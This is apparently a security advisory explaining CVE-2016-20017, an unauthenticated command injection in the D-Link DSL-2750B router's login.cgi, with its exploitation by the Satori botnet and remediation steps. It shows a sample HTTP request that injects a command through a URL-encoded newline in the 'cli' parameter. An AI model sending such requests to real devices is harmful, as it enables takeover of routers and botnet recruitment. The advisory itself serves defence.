CVE-2016-20017

What Is D-Link DSL-2750B?

The D-Link DSL-2750B is a DSL modem/router combo device deployed in home and small business environments, providing DSL broadband connectivity with integrated Wi-Fi and wired LAN switching. It was widely deployed by internet service providers (ISPs) as customer premises equipment (CPE) in multiple regions including South America, Asia, and the Middle East — making it a mass-deployment device with millions of units in the field. The DSL-2750B's web management interface is often accessible from the internet (WAN side) as part of its remote management functionality, exposing it directly to internet-based attackers.

CPE devices provided by ISPs are particularly challenging to secure: users rarely interact with or update them, firmware update mechanisms may be under ISP control rather than the end user's, and the devices are internet-facing by design. A vulnerability in mass-deployed ISP CPE represents a massive exploitable surface.

Overview

CVE-2016-20017 is an unauthenticated command injection vulnerability in the D-Link DSL-2750B router's login.cgi web interface. The cli parameter passed to login.cgi is processed without sanitization and injected directly into an OS command execution context, allowing a remote unauthenticated attacker to execute arbitrary commands with root privileges simply by sending a crafted HTTP request to the device's web management interface. The Satori botnet (a Mirai variant) weaponized this vulnerability in November 2017 for mass recruitment of DSL-2750B devices. CVE-2016-20017 was formally published by NVD in 2022 despite active exploitation beginning years earlier. CISA added it to the KEV catalog in January 2024.

Affected Versions

Check D-Link's security advisory SAP10088 for patch availability for your specific hardware/firmware version. Some DSL-2750B variants may not have received security patches.

Technical Details

Root Cause: login.cgi cli Parameter Command Injection

CVE-2016-20017 is a command injection vulnerability (CWE-77) in the D-Link DSL-2750B's embedded HTTP server. The login.cgi script — the router's login page — accepts a cli parameter that is intended to pass a command-line argument for internal processing. The cli parameter is passed directly to a shell command execution function without sanitizing shell metacharacters (;, |, &&, $(), etc.).

Exploitation example:

GET /login.cgi?cli=aa%0a<malicious-command> HTTP/1.1
Host: 192.168.1.1

Using a URL-encoded newline (%0a) or other shell injection characters in the cli parameter causes the embedded shell to execute additional commands following the intended cli argument. The injected command runs as root in the embedded Linux environment.

Satori botnet payload (2017): The Satori botnet (tracked as a Mirai variant by Checkpoint and other researchers) exploited CVE-2016-20017 with a payload that:

1. Sent the login.cgi exploit request to DSL-2750B management ports (80, 8080)
2. Used the command injection to download and execute Satori malware from attacker-controlled servers
3. Enrolled the compromised device in the Satori botnet for DDoS and scanning operations

No authentication required: Unlike the companion DCS-930L vulnerability (CVE-2016-11021, PR:H), CVE-2016-20017 requires no authentication — the injection occurs in login.cgi, which is the pre-authentication login page. Any attacker who can reach port 80 or 8080 on the DSL-2750B can exploit it without any credentials.

Internet-Accessible Attack Surface

The DSL-2750B is a DSL CPE device — its WAN interface faces the internet directly. The web management interface, if accessible from the WAN side (common in ISP deployments for remote management), exposes CVE-2016-20017 to any internet attacker:

• No LAN access required — the exploit works over the internet
• No credentials required — pre-authentication injection
• Massively scalable — automated scanning finds all DSL-2750B devices by banner or port fingerprint

Attack Characteristics

Discovery

The vulnerability in D-Link DSL-2750B's login.cgi was exploited by the Satori botnet in November 2017, which brought it to widespread security community attention. D-Link published security advisory SAP10088 acknowledging the issue. CVE assignment and NVD publication were delayed until 2022 — a notable gap reflecting the slow CVE tracking process for older IoT vulnerabilities.

Exploitation Context

• Satori botnet mass exploitation (2017): Satori, a Mirai variant written by a threat actor later identified and prosecuted, used CVE-2016-20017 as one of its propagation exploits in November–December 2017; Satori spread rapidly to hundreds of thousands of DSL-2750B devices within days, demonstrating the scale achievable with an unauthenticated pre-auth exploit against ISP-deployed CPE
• ISP CPE mass deployment vulnerability: The DSL-2750B's widespread ISP deployment in specific regions (particularly South America, Asia, and Middle East) created a geographically concentrated vulnerable population; region-specific attacks targeting ISP customers could exploit millions of devices via a single vulnerability
• No credential barrier: The pre-authentication injection (PR:N, UI:N) means CVE-2016-20017 is exploitable by fully automated scanners without any brute-force credential step; this reduces time-to-compromise to seconds per target
• Long unpatched exploitation window: CVE-2016-20017 was actively exploited by botnets for at least 5 years before formal CVE assignment in 2022 and CISA KEV addition in 2024; ISP CPE devices with long deployment lifetimes and slow firmware update cycles create multi-year exploitation windows
• CISA KEV (2024): Added January 8, 2024, reflecting continued active exploitation of DSL-2750B devices in botnet campaigns and other attacks

Remediation

1. Apply D-Link firmware update — check D-Link's security advisory SAP10088 and the D-Link support portal for a patched firmware version for your DSL-2750B model and region variant. Apply the update if available.

2. Disable WAN-side web management access — if the DSL-2750B management interface (HTTP, HTTPS) is accessible from the internet (WAN side), disable WAN-side remote management in the router settings. This is the single most impactful mitigation for internet-based exploitation.

3. Contact your ISP — if the DSL-2750B is ISP-provided CPE, contact your ISP to request a firmware update or device replacement; ISPs may have the ability to remotely push firmware updates to CPE devices via TR-069 management protocols.

4. Replace end-of-support devices — if no firmware patch is available for your DSL-2750B variant, replace the device with a current, actively supported modem/router. Priority replacement is warranted given the CRITICAL severity and confirmed active exploitation.

5. Check for signs of compromise — if the device has been internet-accessible with this vulnerability, assume it may be compromised; check for unexpected network traffic, unfamiliar devices on the LAN, and DNS server setting changes; perform a factory reset before applying patches or replacing the device.

6. Change management credentials — even after patching the pre-auth injection, set a strong admin password to prevent authenticated attacks and unauthorized configuration changes.